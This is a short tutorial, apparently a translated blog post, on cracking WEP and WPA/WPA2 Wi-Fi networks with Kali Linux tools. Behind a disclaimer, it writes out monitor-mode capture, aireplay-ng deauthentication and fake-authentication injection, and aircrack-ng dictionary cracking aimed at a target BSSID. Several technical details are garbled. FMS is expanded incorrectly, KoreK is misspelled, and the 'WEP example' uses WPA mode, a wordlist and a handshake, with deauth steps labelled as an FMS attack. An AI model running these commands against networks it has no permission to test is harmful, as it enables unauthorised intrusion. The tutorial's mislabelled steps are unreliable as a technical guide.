Teknik dan Protokol Wireless (WEP, WPA/WPA2) (en)

Disclaimer: This information is provided for educational and research purposes in the field of cybersecurity. Use of this information for illegal or unethical purposes is strictly prohibited. Always perform penetration testing with the permission of the network owner.

Introduction

Kali Linux is a popular Linux distribution among ethical hackers and cybersecurity professionals. One of its main features is a comprehensive collection of tools for penetration testing networks, including wireless networks. In this context, we will discuss common hacking techniques used to break into wireless networks that use the WEP, WPA, and WPA2 security protocols.

Wireless Security Protocols

• WEP (Wired Equivalent Privacy): The oldest and weakest security protocol. Easily cracked using various techniques.
• WPA (Wi-Fi Protected Access): The successor to WEP, offers improved security, but is still vulnerable to some attacks.
• WPA2: The current security standard, considered much more secure than WEP and WPA.

Tools Used in Kali Linux

• Aircrack-ng: A complete suite of tools for cracking WEP and WPA/WPA2.
• iwconfig: Used to configure wireless interfaces.
• airodump-ng: Collects packets from a wireless network.
• aireplay-ng: Injects packets into a wireless network.

General Steps

• Monitor Mode: Switch your wireless interface to monitor mode to capture packets.

airmon-ng start wlan0

• Network Detection: Scan for wireless networks around you.

airodump-ng mon0

• Select Target: Select the network you want to attack based on its BSSID (Basic Service Set Identifier).
• Analyze Packets: Analyze captured packets to get information like handshakes, IVs (Initialization Vectors), and nonces.
• Perform the Attack:
  • WEP: Use FMS (Fragmentation, Message, Sequence) or Corek attacks to crack the WEP key.
  • WPA/WPA2: Use dictionary attacks or brute force attacks to find the passphrase.
• Crack the Key: After getting enough packets, use aircrack-ng to crack the key.

aircrack-ng -a 2 -b <BSSID> -w /wordlist.txt capture.cap

WEP Attack Example with Aircrack-ng

# Start capturing packets
airodump-ng mon0

# After getting the handshake, stop capturing
airodump-ng mon0 --write capture

# Perform FMS attack
aireplay-ng --fakeauth 0 -a <BSSID> -c <client_BSSID> mon0
aireplay-ng --deauth 0 -a <BSSID> -c <client_BSSID> mon0

# Crack WEP key
aircrack-ng -a 2 -b <BSSID> -w /wordlist.txt capture-01.cap

Ethical Considerations

• Permission: Always get permission from the network owner before performing penetration testing.
• Educational Purpose: Use this information for educational and research purposes, not for malicious purposes.
• Legal: Violations of network security can result in legal consequences.

Conclusion

Wireless network hacking is a complex and ever-evolving topic. Kali Linux provides very useful tools for performing penetration testing. However, it is important to remember that wireless network security is constantly being improved, and new techniques are constantly emerging. Therefore, it is important to continue learning and updating your knowledge of cybersecurity.

Note: The information above is just a general overview. For a deeper understanding, it is recommended to study the official documentation of the mentioned tools and follow more detailed tutorials.

Interesting Links

• Ethical Hacking
• WPA3: The latest security standard that is harder to crack
• Dictionary Attack and Brute Force: Techniques used to find passphrases
• Krack Attack: Vulnerability in WPA2 that allows attackers to crack keys
• Countermeasures: How to secure your wireless network from attacks